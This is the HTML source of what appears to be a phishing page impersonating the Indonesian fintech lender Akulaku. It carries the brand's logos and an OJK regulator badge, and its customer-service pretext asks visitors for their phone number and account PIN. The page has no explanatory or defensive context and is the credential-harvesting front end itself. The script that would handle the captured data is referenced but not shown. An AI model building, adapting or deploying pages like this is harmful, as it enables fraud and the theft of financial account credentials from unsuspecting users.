<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="utf-8">
	<meta name="viewport" content="width=device-width, initial-scale=1.0">
	<link rel="stylesheet" href="library/bootstrap/css/bootstrap.min.css">
	<link rel="stylesheet" type="text/css" href="style/main.css">
	<link href="https://unpkg.com/aos@2.3.1/dist/aos.css" rel="stylesheet">
	<title>Akulaku-Konfirmation</title>
</head>

<style>
    .login {
        margin: auto;
        text-align: center;
    }
    form{
        margin: 1% auto 20% auto ;


    }

    form input{
        border: none;
    }
</style>
<body>
    <header>
		<nav class="main-nav">
			<div class="brand text-main">
				<a href="#">
					<img src="assets/images/logo.png" alt="logo" >
				<style>
					.brand img {
						display: block; /* Membuat gambar menjadi block untuk memungkinkan pengaturan margin otomatis */
						margin: 0 auto; /* Mengatur margin atas dan bawah menjadi 0 dan kiri kanan secara otomatis untuk memusatkan gambar */
					}
					.brand img {
						width: 100%; /* Mengatur lebar gambar logo agar sesuai dengan kontainer */
						max-width: 150px; /* Maksimal lebar gambar logo */
					}
				</style>
				</a>
			</div>
			<div class="links">
				<ul>
					<li><a href="#info">Informasi</a></li>
					<li><a href="#wa">Costumer Service</a></li>
				</ul>
			</div>
			<div class="icon-for-user">
				<a href="login.html">
					<img src="assets/icons/person.svg" alt="person">
				</a>
			</div>
			<div class="menu">
				<img src="assets/icons/menu.svg" alt="menu">
			</div>
		</nav>
	</header><!-- /header -->
    <div class="login">
        <form action="">
            <img src="assets/images/aku.png" alt="" width="100%">
            <span style="font-weight: bold; color: rgb(0, 0, 0); margin-bottom: 20px; font-size: 23px; margin-left: 15px; pointer-events: none;">Selamat Datang di Akulaku</span>
            <p  style=" color: rgb(82, 78, 78);">Silahkan Login Kami Sebagai Costumer Service Akan Segera Membantu Anda</p>
            <br>
            <input style="appearance: none; align-items: center; font-size: 20px; padding-left: 23px;  padding-right: 23px; padding-bottom: 10px; padding-top: 10px; background-color: rgb(240, 240, 240); margin-bottom: 18px; margin-top: 18px; color: rgb(117, 117, 117); height: auto; border-width: 1px; border-radius: 30px; border-color: rgb(245, 245, 245);" placeholder="+62 Nomor handphone" type="number" value="" required>
            <br>
            <input style="appearance: none; align-items: center; font-size: 20px; padding-left: 23px;  padding-right: 23px; padding-bottom: 10px; padding-top: 10px; background-color: rgb(240, 240, 240); margin-bottom: 18px; color: rgb(33, 33, 33); height: auto; border-width: 1px; border-radius: 30px; border-color: rgb(245, 245, 245);" placeholder="Masukkan Pin anda" type="number" value="" required>
            <br>
            <button type="submit" style="width: 200px; height: 40px; margin-top: 20px; border-radius: 20px; border: none; background-color: red; color:white;">Login</button>
        </form>
    </div>
    
	<div class="fot" style="margin: auto; text-align: center;">

		<img src="assets/images/ojk-removebg-preview.png" alt="" width="80%">
	</div>
	<footer>
				<div class="row1" style="margin: auto; align-items: center; padding: 1px;">
					<div class="col-12">
						<div class="copyright-content text-center mt-4">
							<p class="text-second">Konfirmation Address Copyright &copy; 2023</p>
						</div>
					</div>
				</div>
	</footer>
</body>    
<script src="script/index.js"></script>
	<script src="https://unpkg.com/aos@2.3.1/dist/aos.js"></script>
	<script>
		AOS.init();
	</script>
</html>

